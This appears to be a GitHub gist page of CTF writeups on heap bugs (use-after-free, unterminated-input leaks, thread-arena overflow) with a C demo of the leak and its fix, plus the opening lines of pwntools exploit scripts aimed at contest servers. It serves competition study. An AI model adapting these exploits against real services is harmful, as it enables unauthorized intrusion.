romanking98
View 1_stringer_writeup.md

Stringer (18 solves)

Challenge from RCTF, the qualifier round for XCTF.

Bugs

There are two bugs in the program. The first is an obvious use-after-free (UAF). The second is that our input is not NULL-terminated right after the bytes we supply, which gives us a leak: the NULL byte is written at buf + size - 1 regardless of how much was actually read, and the read loop only breaks when the byte it reads is "\n". Whatever the chunk held between the end of our input and buf + size - 1 is therefore still there, and any print that walks to the terminator outputs it.

However, leaking is tricky, since the program uses calloc, which zero-fills the newly allocated heap chunk, so the stale bytes we would like to read back are cleared at allocation time.
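As an added illustration (not the challenge binary and not code from the original gist), the C below models the two behaviours just described: a read loop that stops only on a newline and then writes the NULL at buf + size - 1, so a print of the buffer runs into whatever the chunk previously held, and the same loop over a calloc'd chunk, where those stale bytes are already zero. The 32-byte chunk size, the 'S' filler standing in for stale heap data and the "AB\n" input are constructed for the demonstration; a fixed variant that terminates right after the input is shown for comparison.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example, not the challenge code. Models the Stringer read routine:
 * the loop stops on '\n' (or when the buffer is full) and the terminator is
 * written at buf[size - 1] instead of right after the last byte read.
 * src/srclen stand in for the bytes a read() call would return (constructed input). */
static size_t read_input_vuln(char *buf, size_t size, const char *src, size_t srclen)
{
    size_t i = 0;
    while (i < size - 1 && i < srclen && src[i] != '\n') {
        buf[i] = src[i];
        i++;
    }
    buf[size - 1] = '\0';   /* bug: buf[i .. size-2] keep whatever was already in the chunk */
    return i;
}

/* Hardened version: the terminator goes right after the last byte read. */
static size_t read_input_fixed(char *buf, size_t size, const char *src, size_t srclen)
{
    size_t i = 0;
    while (i < size - 1 && i < srclen && src[i] != '\n') {
        buf[i] = src[i];
        i++;
    }
    buf[i] = '\0';
    return i;
}

#define CHUNK 32   /* constructed chunk size for the demonstration */

/* Returns how many bytes a puts()/printf("%s") of the buffer would emit after
 * reading "AB\n" into a CHUNK-byte allocation. With use_calloc == 0 the chunk is
 * first filled with 'S', simulating stale data left behind by a previous owner
 * of a recycled malloc chunk. */
size_t leaked_length(int use_calloc, int fixed)
{
    char *buf = use_calloc ? calloc(1, CHUNK) : malloc(CHUNK);
    if (!buf)
        return 0;
    if (!use_calloc)
        memset(buf, 'S', CHUNK);   /* stand-in for leftovers from an earlier use of the chunk */

    const char input[] = "AB\n";   /* constructed user input */
    if (fixed)
        read_input_fixed(buf, CHUNK, input, sizeof input - 1);
    else
        read_input_vuln(buf, CHUNK, input, sizeof input - 1);

    size_t n = strlen(buf);   /* the bytes a '%s'-style print would walk over */
    free(buf);
    return n;
}

int main(void)
{
    /* malloc + buggy read: 2 input bytes plus 29 stale bytes reach the terminator */
    printf("malloc + buggy read : %zu bytes printed\n", leaked_length(0, 0));
    /* calloc + buggy read: the chunk was zeroed, so the print stops after "AB" */
    printf("calloc + buggy read : %zu bytes printed\n", leaked_length(1, 0));
    /* fixed read: terminator is at buf[2], nothing beyond the input is printed */
    printf("malloc + fixed read : %zu bytes printed\n", leaked_length(0, 1));
    return 0;
}
```

The first case is the leak the writeup relies on; the second is exactly why calloc gets in the way, and the third is the one-line fix (terminate at buf[i], not buf[size - 1]).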

View gogogadget_writeup.md

GoGoGadget (1 solve)

Tool credits: @scwuaptx (pwngdb), for making excellent malloc research public.

Layout

*------------------------------*
          Hi Inspector!
View null_writeup.md

NULL ( 17-18 solves)

The challenge spawns a thread to do the work, so a thread arena (thread_arena) is created in a fresh mmap'd segment rather than on the main brk heap.

Bug

Overflow in the read function:

 for ( i = 0LL; ; i += v3 )
  {
View exploit_sapeloshop.py
#!/usr/bin/python
from pwn import *
elf = ELF("./libc-2.23.so")   # target libc, used for symbol/offset lookups
#r = remote("http://sapeloshop.teaser.insomnihack.ch",80)
r = remote('sapeloshop.teaser.insomnihack.ch', 80)
#r = process("./sapeloshop",env={"LD_PRELOAD":"./libc-2.23.so"})   # local run against the target libc
raw_input()   # pause so a debugger can be attached before the exploit starts
i = int("3d714", 16)
View exploit_readme.py
#!/usr/bin/python
from pwn import *
p = remote("35.198.130.245", 1337)
#p = process("./readme_revenge")   # local run
raw_input()   # pause so a debugger can be attached before the exploit starts
#name = "A"*920
name = p64(0x00)   # Pass NULL check.
name += "XXXX"
View exploit_memo.py
#!/usr/bin/python
from pwn import *
elf = ELF("./libc-2.23.so")   # target libc, used for symbol/offset lookups
p = remote("159.203.116.12", 8888)
#p = process("./memo",env={"LD_PRELOAD":"./libc-2.23.so"})   # local run against the target libc
raw_input()   # pause so a debugger can be attached before the exploit starts
def menu():
    # wait for the menu prompt before sending the next choice
    p.recvuntil(">")
View exploit_left.py
#!/usr/bin/python
from pwn import *
# Bit rotation helpers: rotate val left/right by r_bits within a max_bits-wide word.
rol1 = lambda val, r_bits, max_bits: \
    (val << r_bits%max_bits) & (2**max_bits-1) | \
    ((val & (2**max_bits-1)) >> (max_bits-(r_bits%max_bits)))
ror1 = lambda val, r_bits, max_bits: \
    ((val & (2**max_bits-1)) >> r_bits%max_bits) | \
    (val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1))
View exploit_secure.py
#!/usr/bin/python
from pwn import *
p = remote("secure_keymanager.pwn.seccon.jp",47225)
#p = process("./secure_keymanager",env={"LD_PRELOAD" : "./libc-2.23.so"})   # local run against the target libc
raw_input()   # pause so a debugger can be attached before the exploit starts
def menu():
    # wait for the menu prompt before sending the next choice
    p.recvuntil(">>")